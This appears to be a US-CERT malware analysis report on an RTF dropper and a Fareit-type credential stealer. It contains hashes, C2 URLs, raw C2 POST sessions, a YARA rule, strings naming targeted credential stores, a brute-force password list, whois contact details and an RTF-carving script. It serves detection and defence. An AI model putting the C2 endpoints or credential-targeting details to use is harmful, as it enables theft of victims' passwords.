(F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a)   Characterized_By   (S) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e

Description

This is a malicious RTF document containing an embedded, hex-encoded executable. When opened, the RTF decodes the executable and installs it as %Temp%\m3.tmp (9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5). The document then attempts to execute m3.tmp, but in the analysis environment the launch fails because of the .tmp file extension.
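The decoding step above is simple enough to reproduce for triage: the payload sits in the document as hex text, so it can be carved and hashed without opening the file in Word. The Python below is an added example, not code from the report: it finds hex runs (preferring \objdata groups, where droppers usually keep them), decodes them and keeps any that contain a DOS "MZ" header. The RTF it parses is constructed and wraps a fake 128-byte stub, so the real m3.tmp payload is not reproduced here; the 64-byte minimum run length and the 1 KiB window in which the MZ header is sought are assumptions about typical droppers.

```python
"""Carve hex-encoded executables out of an RTF dropper like the one described above.

Added example, not from AR-17-20045: the RTF is constructed and carries a fake
128-byte "executable" (an MZ header plus filler), so the real 9f918f... payload is
not reproduced. The 64-byte minimum run and the 1 KiB search window for the MZ
header are assumptions about typical droppers.
"""
import hashlib
import re

# Droppers usually keep the payload as hex text inside an \objdata group, wrapped
# across lines; fall back to scanning the whole file if no such group is present.
OBJDATA_GROUP = re.compile(rb"\\objdata\b([^{}]*)")
HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){64,}")


def hex_runs(rtf):
    """Hex text runs from \\objdata groups, or from anywhere in the file as a fallback."""
    runs = []
    for group in OBJDATA_GROUP.finditer(rtf):
        runs.extend(m.group(0) for m in HEX_RUN.finditer(group.group(1)))
    if not runs:
        runs = [m.group(0) for m in HEX_RUN.finditer(rtf)]
    return runs


def decode_run(run):
    """Remove whitespace and decode the hex text; a dangling odd nibble is dropped."""
    clean = re.sub(rb"\s+", b"", run)
    if len(clean) % 2:
        clean = clean[:-1]
    return bytes.fromhex(clean.decode("ascii"))


def carve_executables(rtf):
    """Decode every hex run and return those with a DOS 'MZ' header near the start."""
    carved = []
    for run in hex_runs(rtf):
        blob = decode_run(run)
        offset = blob.find(b"MZ")
        if offset < 0 or offset > 1024:   # an OLE Package wrapper may precede the PE
            continue
        payload = blob[offset:]
        carved.append({"offset": offset, "size": len(payload),
                       "sha256": hashlib.sha256(payload).hexdigest(), "data": payload})
    return carved


def build_demo_rtf():
    """Constructed RTF wrapping a fake MZ stub, hex-encoded and wrapped at 64 characters."""
    fake_exe = b"MZ" + bytes(range(126))       # stand-in for a real executable, not code
    hexed = fake_exe.hex().encode("ascii")
    wrapped = b"\n".join(hexed[i:i + 64] for i in range(0, len(hexed), 64))
    return (b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata\n"
            + wrapped + b"\n}}\\par Quarterly update attached.\\par}")


if __name__ == "__main__":
    for hit in carve_executables(build_demo_rtf()):
        print(f"MZ at +{hit['offset']}, {hit['size']} bytes, sha256 {hit['sha256']}")
```

The SHA-256 of each carved payload is what to compare against the 9f918f... hash above; a mismatch on a sample that otherwise matches the RTF's hash would indicate a different embedded stage. Droppers that obfuscate the hex (interleaved control words, split nibbles, or a non-hex encoding) will defeat the regex, so an empty result is not proof that no payload is present.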

Screenshots

• ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e



9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5

Details

Name     9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5
Size     117248
Type     PE32 executable (GUI) Intel 80386, for MS Windows
MD5      617ba99be8a7d0771628344d209e9d8a
SHA1     7cefb021fb30f985b427b584be9c16e364836739
ssdeep   3072:CN7FVxVzbL02rXlwilrCIX1O6OhOqsY9WZYWmwdaX82X45iAKMaEUSDslGz0x:CNxVjbLXDup2IXY6O0VYIOMW
Entropy  6.86854130027


Antivirus

F-prot               W32/Dridex.HX
McAfee               Fareit-FHF
K7                   Trojan (004df8ee1)
Systweak             trojan.passwordstealer
F-secure             Gen:Variant.Razy.41230
VirIT                Trojan.Win32.Crypt5.AYWX
Symantec             Trojan.Fareit
VirusBlokAda         TrojanPSW.Fareit
Zillya!              Trojan.Fareit.Win32.14782
ClamAV               Win.Trojan.Agent-5486256-0
Kaspersky            Trojan-PSW.Win32.Fareit.bshk
TrendMicro           TSPY_FA.CFEECD19
Sophos               Troj/Fareit-AMQ
Avira                TR/AD.Fareit.Y.ehkw
Microsoft            PWS:Win32/Fareit
Ahnlab               Trojan/Win32.Fareit
ESET                 a variant of Win32/Kryptik.EPKG trojan
NANOAV               Trojan.Win32.AD.ebscsw
TrendMicroHouseCall  TSPY_FA.CFEECD19
Ikarus               Trojan.Win32.Zlader
AVG                  Crypt5.AYWX


PE Information

Compiled  2016-04-18T11:56:11Z

PE Sections

Name      MD5                               Raw Size  Entropy
(header)  e1c85b83a230f3318ebc6fa89c22e4ca  1024      2.65800537214
.text     03d3283ed2aeae19148e30ce10bf86a6  32256     6.56847358123
.rdata    2b14260b6390c8b1470b6c7b33aead11  52224     7.2456007683
.data     c78d3b76f24406d13bd8f743617d103d  8704      7.47497492698
relocat   50e4a218247898300dfa8489c256fc42  1024      4.0454558827
.engine   105b697001f91df315bba402a79fde8b  512       2.16767435848
.rsrc     5f0793cbe2573fe809f569f742edb453  21504     3.88806352708

Packers

Name                      Version  Entry Point
Microsoft Visual C++ ?.?  NA       NA




Relationships

(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Characterized_By   (S) searching_reg_pop3.bmp
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) editprod.waterfilter.in.ua
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) insta.reduct.ru
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) one2shoppee.com
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) ritsoperrol.ru
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) littjohnwilhap.ru
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) wilcarobbe.com
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Connected_To       (D) mymodule.waterfilter.in.ua/system/logs/xtool.exe
(F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)   Dropped_By         (F) ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e (81f1a)

Description

During analysis this file was dropped by ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e. It is a heavily packed/protected 32-bit Windows executable. Static analysis indicates the application is a fully functioning remote access tool. During runtime, it attempts to communicate with the C2 locations displayed below.

wilcarobbe.com/zapoy/gate.php
littjohnwilhap.ru/zapoy/gate.php
ritsoperrol.ru/zapoy/gate.php
one2shoppee.com/system/logs/xtool.exe
insta.reduct.ru/system/logs/xtool.exe
editprod.waterfilter.in.ua/system/logs/xtool.exe
mymodule.waterfilter.in.ua/system/logs/xtool.exe
The file xtool.exe was not available for download at the time of analysis.

This executable drops and executes a batch file, '%Temp%\[random digits].bat', that deletes the executable and then the batch file itself at the end of execution.

Displayed below are sample connections between the malware and its C2 servers.

—Begin Sample Connections to C2 Server—

POST /zapoy/gate.php HTTP/1.0
Host: wilcarobbe.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u.
X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]'..Y.L.5.b[>?.".).>...
>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5...

POST /zapoy/gate.php HTTP/1.0
Host: littjohnwilhap.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u.
X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]\.Y.L.5.b[>?.".).>...
>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5...

POST /zapoy/gate.php HTTP/1.0
Host: ritsoperrol.ru
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

...[xXP.YG.4...d...S.q0....4.v..8 ..Y.u.
X..3S*3.S..%<A.5..U..."N.W...eY...o. A ...V.. A .v.#...+.]\.Y.L.5.b[>?.".).>...
>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5...

—End Sample Connections to C2 Server—

Static analysis of the unpacked portions of this file indicates it is, among other things, capable of targeting multiple Windows applications. For example, the malware searches the Windows registry for keys used by several Windows email clients and, if they are found, attempts to extract the stored email passwords from them, evidently to gain unauthorized access to the victim user's email.

In addition, the software looks for registry keys used by the file manager Total Commander (and, as the strings below show, by a range of FTP/SFTP clients, browsers and other mail clients), evidently to gain unauthorized access to the victim user's stored files and saved credentials. The software also contains a list of commonly used passwords, indicating that it gives an operator the capability to brute-force access to a victim user's email accounts or file-storage locations. Displayed below is a YARA signature which may be used to detect this software both packed on disk and running in system memory.

—Begin YARA Signature—

rule unidentified_malware_two
{
    meta:
        Author = "US-CERT Code Analysis Team"
        Date = "16JAN17"
        Incident = 10105049
        File = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
        MD5 = "617BA99BE8A7D0771628344D209E9D8A"
    strings:
        $my_string_one = "/zapoy/gate.php"
        $my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55 FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
        $my_string_three = "S:\\Lidstone\\renewing\\FIA\\disable\\ln.pdb"
        $my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
        $my_string_five = "fuckyou1"
        $my_string_six = "xtool.exe"
    condition:
        ($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six)
}

—End YARA Signature—

Displayed below are strings of interest extracted from the unpacked portions of this malware:

—Begin Strings of Interest—

1DA409EB2825851644CCDAB
1RcpNUE12zpJ8uDaDqlygR70aZI2ogwes
wilcarobbe.com/zapoy/gate.php
littjohnwilhap.ru/zapoy/gate.php
ritsoperrol.ru/zapoy/gate.php
one2shoppee.com/system/logs/xtool.exe
insta.reduct.ru/system/logs/xtool.exe
editprod.waterfilter.in.ua/system/logs/xtool.exe
YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
MODU
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
UninstallString
DisplayName
.exe
Software\WinRAR
open
vaultcli.dll
VaultOpenVault
VaultEnumerateItems
VaultGetItem
VaultCloseVault
VaultFree
kernel32.dll
WTSGetActiveConsoleSessionId
ProcessIdToSessionId
netapi32.dll
NetApiBufferFree
NetUserEnum
ole32.dll
StgOpenStorage
advapi32.dll
AllocateAndInitializeSid
CheckTokenMembership
FreeSid
CredEnumerateA
CredFree
CryptGetUserKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
RevertToSelf
OpenProcessToken
ImpersonateLoggedOnUser
GetTokenInformation
ConvertSidToStringSidA
LogonUserA
LookupPrivilegeValueA
AdjustTokenPrivileges
CreateProcessAsUserA
crypt32.dll
CryptUnprotectData
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertCloseStore
CryptAcquireCertificatePrivateKey
msi.dll
MsiGetComponentPathA
pstorec.dll
PStoreCreateInstance
userenv.dll
CreateEnvironmentBlock
DestroyEnvironmentBlock
shell32.dll
SHGetFolderPathA
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
S-1-5-18
SeImpersonatePrivilege
SeTcbPrivilege
SeChangeNotifyPrivilege
SeCreateTokenPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeIncreaseQuotaPrivilege
SeAssignPrimaryTokenPrivilege
GetNativeSystemInfo
kernel32.dll
IsWow64Process
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyServer
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
Line
wcx_ftp.ini
\GHISLER
InstallDir
FtpIniName
Software\Ghisler\Windows Commander
Software\Ghisler\Total Commander
CUTEFTP
QCHistory
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 9\QCToolbar
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\sm.dat
Software\FlashFXP\3
Software\FlashFXP
Software\FlashFXP\4
InstallerDataPath
path
Install Path
DataFolder
\Sites.dat
\Quick.dat
\History.dat
\FlashFXP\3
\FlashFXP\4
\FileZilla
\sitemanager.xml
\recentservers.xml
\filezilla.xml
Software\FileZilla
Software\FileZilla Client
Install_Dir
Host
User
Pass
Port
Remote Dir
Server Type
Server.Host
Server.User
Server.Pass
Server.Port
Path
ServerType
Last Server Host
Last Server User
Last Server Pass
Last Server Port
Last Server Path
Last Server Type
Software\FTPWare\COREFTP\Sites
Host
User
Port
PthR
SSH
.ini
\VanDyke\Config\Sessions
\Sessions
Software\VanDyke\SecureFX
Config Path
Password
HostName
UserName
RemoteDirectory
PortNumber
FSProtocol
Software\Martin Prikryl
http[:]//
https[:]//
ftp://
opera
wand.dat
Software\Opera Software
Last Directory3
Last Install Path
Opera.HTML\shell\open\command
\Opera Software
nss3.dll
NSS_Init
NSS_Shutdown
NSSBase64_DecodeBuffer
SECITEM_FreeItem
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
PK11_FreeSlot
profiles.ini
Profile
IsRelative
Path
PathToExe
prefs.js
logins.json
signons.sqlite
signons.txt
signons2.txt
signons3.txt
encryptedPassword":"
encryptedUsername":"
hostname":"
#2c
#2d
#2e
Firefox
\Mozilla\Firefox\
Software\Mozilla
ftp://
http[:]//
https[:]//
ftp.
Mozilla
\Mozilla\Profiles\
Favorites.dat
WinFTP
Internet Explorer
WininetCacheCredentials
MS IE FTP Passwords
DPAPI:
%02X
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData
http[:]//www[.]facebook.com/
Microsoft_WinInet_*
ftp://
SspiPfc
SQLite format 3
table
CONSTRAINT
PRIMARY
UNIQUE
CHECK
FOREIGN
Web Data
Login Data
logins
origin_url
password_value
username_value
ftp://
http[:]//
https[:]//
moz_logins
hostname
encryptedPassword
encryptedUsername
\Google\Chrome
\Chromium
\ChromePlus
Software\ChromePlus
Install_Dir
.rdp
TERMSRV/*
password 51:b:
username:s:
full address:s:
TERMSRV/
.oeaccount
Salt
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Software\Microsoft\Windows Mail
Software\IncrediMail
EmailAddress
Technology
PopServer
PopPort
PopAccount
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
Email
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTP Password
SMTP Password
Software\Microsoft\Internet Account Manager\Accounts
Identities
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Software\Microsoft\Internet Account Manager
Outlook
\Accounts
identification
identitymgr
inetcomm server passwords
outlook account manager passwords
identities
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Thunderbird
\Thunderbird
samantha
michelle
david
eminem
scooter
asdfasdf
sammy
baby
diamond
maxwell
55555
justin
james
chicken
danielle
iloveyou2
fuckoff
prince
junior
rainbow
112233
fuckyou1
nintendo
peanut
none
church
bubbles
robert
222222
destiny
loving
gfhjkm
mylove
jasper
hallo
123321
cocacola
helpme
nicole
guitar
billgates
looking
scooby
joseph
genesis
forum
emmanuel
cassie
victory
password
foobar
ilovegod
nathan
blabla
digital
peaches
football1
11111111
power
thunder
gateway
iloveyou!
football
tigger
corvette
angel
killer
creative
123456789
google
zxcvbnm
startrek
ashley
cheese
sunshine
Christ
000000
soccer
qwerty1
friend
summer
1234567
merlin
phpbb
12345678
jordan
saved
dexter
viper
winner
sparky
windows
123abc
lucky
anthony
jesus
ghbdtn
admin
hotdog
baseball
password1
dragon
trustno1
jason
internet
mustdie
john
letmein
123
mike
knight
jordan23
abc123
red123
praise
freedom
jesus1
12345
london
computer
microsoft
muffin
qwert
mother
master
111111
qazwsx
samuel
Canada
slayer
rachel
onelove
qwerty
prayer
iloveyou1
whatever
god
password
blessing
snoopy
1q2w3e4r
cookie
11111
chelsea
pokemon
hahaha
aaaaaa
hardcore
shadow
welcome
mustang
654321
bailey
blahblah
matrix
jessica
stella
benjamin
testing
secret
trinity
richard
peace
shalom
monkey
iloveyou
thomas
blink182
jasmine
purple
test
angels
grace
hello
poop
blessed
1234567890
heaven
hunter
pepper
john316
cool
buster
andrew
faith
ginger
7777777
hockey
hello1
angel1
superman
enter
daniel
123123
forever
nothing
dakota
kitten
asdf
1111
banana
gates
flower
taylor
lovely
hannah
princess
Compaq
jennifer
myspace1
smokey
matthew
harley
rotimi
fuckyou
soccer1
123456
single
joshua
green
123qwe
starwars
love
silver
austin
michael
amanda
1234
Charlie
bandit
chris
happy
hope
maggie
maverick
online
spirit
george
friends
dallas
adidas
1q2w3e
7777
orange
testtest
asshole
apple
biteme
666666
william
mickey
asdfgh
wisdom
batman
pass

—End Strings of Interest—

Analysis indicates the primary purpose of this application is to give an operator unauthorized access to the victim's user data and email by harvesting the credentials that these applications store.

Screenshots

• searching_reg_pop3.bmp

[Screenshot: disassembly of the registry-walking routine, annotated "Malware Searching For Stored Email". It calls RegEnumKeyEx over the mail account subkeys and then queries the values EmailAddress, Technology, PopServer, PopPort, PopAccount and PopPassword from each.]

Code used by 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 to parse email passwords from the user's Windows registry hive.


Domains

private.directinvesting.com

HTTP Sessions

• GET /lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

• GET /lexicon/index.cfm?source=0887a&css=b9&utm_term=80aaeb73d479e66c6&f=12 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

• GET /lexicon/index.cfm?utm_content=876b73d479e66c6&source=19bd05efa8c HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

Whois 

Address lookup 

canonical name private.directinvesting.com. 
aliases 

addresses 204.12.12.40 
Domain Whois record 

Queried whois.internic.net with "dom directinvesting.com"... 

Domain Name: DIRECTINVESTING.COM 
Registrar: NETWORK SOLUTIONS, LLC. 

Sponsoring Registrar IANA ID: 2 
Whois Server: whois.networksolutions.com 
Referral URL: http[:]//networksolutions.com 
Name Server: NS1.LNHI.NET 
Name Server: NS2.LNHI.NET 
Name Server: NS3.LNHI.NET 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Updated Date: 04-jun-2016 
Creation Date: 04-aug-1997 
Expiration Date: 03-aug-2021 

>>> Last update of whois database: Mon, 16 Jan 2017 12:55:58 GMT <<<

Queried whois.networksolutions.com with "directinvesting.com"... 

Domain Name: DIRECTINVESTING.COM 

Registry Domain ID: 5318825_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.networksolutions.com 

Registrar URL: http[:]//networksolutions.com 

Updated Date: 2016-06-04T07:10:34Z 

Creation Date: 1997-08-04T04:00:00Z 

Registrar Registration Expiration Date: 2021-08-03T04:00:00Z 

Registrar: NETWORK SOLUTIONS, LLC. 

Registrar IANA ID: 2 

Registrar Abuse Contact Email: abuse@web.com 
Registrar Abuse Contact Phone: +1.8003337680 
Reseller: 

Domain Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Registry Registrant ID: 

Registrant Name: The Moneypaper Inc. 

Registrant Organization: The Moneypaper Inc. 

Registrant Street: 555 THEODORE FREMD AVE STE B103 

Registrant City: RYE 

Registrant State/Province: NY 

Registrant Postal Code: 10580-1456 

Registrant Country: US 

Registrant Phone: +1.9149250022 

Registrant Phone Ext: 

Registrant Fax: +1.9149219318 
Registrant Fax Ext: 

Registrant Email: vnelson@moneypaper.com 
Registry Admin ID: 

Admin Name: Nelson, Vita 

Admin Organization: Money Paper Inc 

Admin Street: 411 THEODORE FREMD AVE 

Admin City: RYE 

Admin State/Province: NY 

Admin Postal Code: 10580-1410 
Admin Country: US

Admin Phone: +1.9149250022 

Admin Phone Ext: 

Admin Fax: +1.9149215745 
Admin Fax Ext: 

Admin Email: vnelson@moneypaper.com 
Registry Tech ID: 

Tech Name: Nelson, Vita 

Tech Organization: Money Paper Inc 

Tech Street: 411 THEODORE FREMD AVE 

Tech City: RYE 

Tech State/Province: NY 

Tech Postal Code: 10580-1410 

Tech Country: US 

Tech Phone: +1.9149250022 

Tech Phone Ext: 

Tech Fax: +1.9149215745 
Tech Fax Ext: 

Tech Email: vnelson@moneypaper.com 
Name Server: NS1.LNHI.NET 
Name Server: NS2.LNHI.NET 
Name Server: NS3.LNHI.NET 
DNSSEC: Unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
>>> Last update of WHOIS database: 2017-01-16T12:56:12Z <<<

Network Whois record 

Queried whois.arin.net with "n ! NET-204-12-12-32-1"... 

NetRange: 204.12.12.32 - 204.12.12.63 

CIDR: 204.12.12.32/27 

NetName: THEMONEYPAPERINC 

NetHandle: NET-204-12-12-32-1 

Parent: HOSTMYSITE (NET-204-12-0-0-1) 

NetType: Reassigned 

OriginAS: AS20021 

Customer: THE MONEYPAPER INC. (C02687180) 

RegDate: 2011-02-03 

Updated: 2011-02-03 

Ref: https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1 

CustName: THE MONEYPAPER INC. 

Address: 555 THEODORE FREMD AVENUE SUITE B-103 

City: RYE 

StateProv: NY 

PostalCode: 10580 

Country: US 

RegDate: 2011-02-03 

Updated: 2011-03-19 

Ref: https[:]//whois.arin.net/rest/customer/C02687180 

OrgNOCHandle: IPADM271-ARIN 

OrgNOCName: IP Admin 

OrgNOCPhone: +1-302-731-4948 

OrgNOCEmail: ipadmin@hostmysite.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgTechHandle: IPADM271-ARIN 

OrgTechName: IP Admin 

OrgTechPhone: +1-302-731-4948 

OrgTechEmail: ipadmin@hostmysite.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

OrgAbuseHandle: ABUSE1072-ARIN 

OrgAbuseName: Abuse 

OrgAbusePhone: +1-302-731-4948 

OrgAbuseEmail: abuse@hostmysite.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN 

RNOCHandle: IPADM271-ARIN 

RNOCName: IP Admin 

RNOCPhone: +1-302-731-4948 

RNOCEmail: ipadmin@hostmysite.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

RTechHandle: IPADM271-ARIN 

RTechName: IP Admin 

RTechPhone: +1-302-731-4948 

RTechEmail: ipadmin@hostmysite.com 
RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN

RAbuseHandle: IPADM271-ARIN 

RAbuseName: IP Admin 

RAbusePhone: +1-302-731-4948 

RAbuseEmail: ipadmin@hostmysite.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN 

DNS records 

DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError 
name class type data time to live 

private.directinvesting.com IN A 204.12.12.40 3600s (01:00:00) 

directinvesting.com IN SOA 

server: ns1.lnhi.net 

email: administrator@lnhi.net 

serial: 24 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 3600 

3600s (01:00:00) 


directinvesting.com IN NS ns3.lnhi.net 3600s (01:00:00)

directinvesting.com IN NS ns1.lnhi.net 3600s (01:00:00)

directinvesting.com IN NS ns2.lnhi.net 3600s (01:00:00)

directinvesting.com IN A 204.12.12.41 3600s (01:00:00)

directinvesting.com IN MX

preference: 10

exchange: mail.moneypaper.com

3600s (01:00:00)


Relationships 



(D) private.directinvesting.com Characterized_By (W) Address lookup

(D) private.directinvesting.com Connected_From (F) 55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641 (8f154)

(D) private.directinvesting.com Related_To (H) GET /lexicon/index.c

(D) private.directinvesting.com Related_To (H) GET /lexicon/index.c

(D) private.directinvesting.com Related_To (H) GET /lexicon/index.c

(D) private.directinvesting.com Related_To (I) 204.12.12.40

Description 

Identified Command and Control Location. 


cderlearn.com 



HTTP Sessions 




POST /search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 38 
Connection: Keep-Alive 
Cache-Control: no-cache 
Pragma: no-cache 

rss=a5ce5fa&pg=f8&sa=8816db73d479e8e35 

POST /search.cfm HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

Host: www[.]cderlearn.com 
Content-Length: 46 
Cache-Control: no-cache 

id=3&source=a804b4b73d479eebea&rss=53d0&ei=d3c 
Whois


Address lookup 

canonical name cderlearn.com. 
aliases 

addresses 209.236.67.159 
Domain Whois record 

Queried whois.internic.net with "dom cderlearn.com"... 

Domain Name: CDERLEARN.COM 
Registrar: GODADDY.COM, LLC 
Sponsoring Registrar IANA ID: 146 
